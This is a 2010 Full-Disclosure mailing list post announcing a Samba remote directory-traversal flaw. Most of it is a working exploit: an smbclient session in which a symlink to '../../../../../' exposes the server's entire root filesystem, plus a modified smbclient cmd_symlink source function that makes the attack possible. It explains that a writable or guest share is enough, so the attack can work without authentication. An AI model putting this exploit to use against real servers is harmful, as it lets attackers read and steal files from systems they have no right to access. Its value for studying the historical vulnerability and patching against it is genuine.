Samba Remote Directory Traversal logic fuckup discovered & exploited by Kingcope in 2010
It seems there was a quite similar bug found back in 2004: http://marc.info/?l=bugtraq&m=109658688505723&w=2 A remote attacker can read, list and retrieve nearly all files on the System remotely. Required is a valid samba account for a share which is writeable OR a writeable share which is configured to be a guest account share, in this case this is a preauth exploit. The attacker can write for example into /tmp or where the account he is connecting with has access to (/home/<user> etc). Exploit session (using the patched smbclient exploit): smb is a samba user created. r...@nr-pentest:~/Downloads/samba-3.4.5/source3# /usr/local/samba/bin/smbclient -s /etc/samba/smb.conf -Usmb //<host>/testmount/ Enter smb's password: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0] smb: \> ls . D 0 Wed Feb 3 14:27:03 2010 .. D 0 Wed Feb 3 14:19:13 2010 test D 0 Wed Feb 3 14:19:13 2010 xxx A 1955 Wed Feb 3 14:22:42 2010 45503 blocks of size 2097152. 24437 blocks available smb: \> symlink ../../../../../ foobar smb: \> ls . D 0 Wed Feb 3 14:27:47 2010 .. D 0 Wed Feb 3 14:19:13 2010 xxx A 1955 Wed Feb 3 14:22:42 2010 foobar D 0 Mon Feb 1 20:29:12 2010 45503 blocks of size 2097152. 24437 blocks available smb: \> ls .. NT_STATUS_OBJECT_PATH_SYNTAX_BAD listing \.. 45503 blocks of size 2097152. 24437 blocks available smb: \> cd foobar smb: \foobar\> ls . D 0 Mon Feb 1 20:29:12 2010 .. D 0 Mon Feb 1 20:29:12 2010 initrd.img.old 7646184 Mon Jan 18 13:15:48 2010 boot.ini 18832 Mon Feb 1 20:29:12 2010 home D 0 Mon Jan 18 13:08:24 2010 initrd.img 8007195 Thu Jan 21 21:51:26 2010 .cache DH 0 Sat Jan 23 14:19:08 2010 opt D 0 Sat Jan 30 11:39:59 2010 lib D 0 Thu Jan 21 21:13:01 2010 usr D 0 Sun Jan 31 22:08:11 2010 .libs DH 0 Thu Jan 21 12:30:48 2010 var D 0 Sun Jan 31 21:14:42 2010 bin D 0 Mon Jan 18 13:31:14 2010 selinux D 0 Tue Oct 20 01:05:22 2009 root D 0 Tue Feb 2 19:43:59 2010 vmlinuz.old 3890400 Fri Oct 16 20:03:49 2009 vmlinuz 3890560 Thu Dec 10 20:33:26 2009 etc D 0 Wed Feb 3 14:17:29 2010 srv D 0 Sat Jan 23 20:17:29 2010 proc DR 0 Wed Feb 3 14:10:41 2010 dev D 0 Wed Feb 3 14:11:02 2010 boot D 0 Thu Jan 21 21:51:26 2010 mnt D 0 Sat Jan 23 19:26:23 2010 media D 0 Fri Jan 29 08:32:31 2010 cdrom D 0 Mon Jan 18 12:40:11 2010 tmp D 0 Wed Feb 3 14:26:20 2010 sbin D 0 Thu Jan 21 21:50:58 2010 lost+found D 0 Mon Jan 18 12:39:57 2010 sys D 0 Wed Feb 3 14:10:41 2010 45503 blocks of size 2097152. 24437 blocks available smb: \foobar\> put and get works in the folder now! list open shares, this is normal operation mode not an exploit: r...@nr-pentest:~/Downloads/samba-3.4.5/source3/client# /usr/local/samba/bin/smbclient -s /etc/samba/smb.conf -L //<host>/ Enter root's password: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0] Sharename Type Comment --------- ---- ------- testmount Disk // < this share is writable and exploitable!! print$ Disk Printer Drivers IPC$ IPC IPC Service (nr-pentest server (Samba, Ubuntu)) Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0] Server Comment --------- ------- NR-PENTEST nr-pentest server (Samba, Ubuntu) Workgroup Master --------- ------- WORKGROUP NR-PENTEST smbclient patch (exploit): samba-3.4.5/source3/client/client.c /**************************************************************************** UNIX symlink. ****************************************************************************/ static int cmd_symlink(void) { TALLOC_CTX *ctx = talloc_tos(); char *oldname = NULL; char *newname = NULL; char *buf = NULL; char *buf2 = NULL; char *targetname = NULL; struct cli_state *targetcli; if (!next_token_talloc(ctx, &cmd_ptr,&buf,NULL) || !next_token_talloc(ctx, &cmd_ptr,&buf2,NULL)) { d_printf("symlink <oldname> <newname>\n"); return 1; } oldname = talloc_asprintf(ctx, "%s", // << HERE modified buf); if (!oldname) { return 1; } newname = talloc_asprintf(ctx, "%s", // << HERE modified buf2); if (!newname) { return 1; } /* ORIGINAL SMBCLIENT SOURCE LINES TO BE MODIFIED (SEE ABOVE). oldname = talloc_asprintf(ctx, "%s%s", // < modified (see above) client_get_cur_dir(), // < removed (see above) buf); if (!oldname) { return 1; } newname = talloc_asprintf(ctx, "%s%s", // < modified (see above) client_get_cur_dir(), // < removed (see above) buf2); if (!newname) { return 1; } ----------------------------------------------*/ if (!cli_resolve_path(ctx, "", auth_info, cli, oldname, &targetcli, &targetname)) { d_printf("link %s: %s\n", oldname, cli_errstr(cli)); return 1; } if (!SERVER_HAS_UNIX_CIFS(targetcli)) { d_printf("Server doesn't support UNIX CIFS calls.\n"); return 1; } if (!cli_unix_symlink(targetcli, targetname, newname)) { d_printf("%s symlinking files (%s -> %s)\n", cli_errstr(targetcli), newname, targetname); return 1; } return 0; } // Cheers, // kcope _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/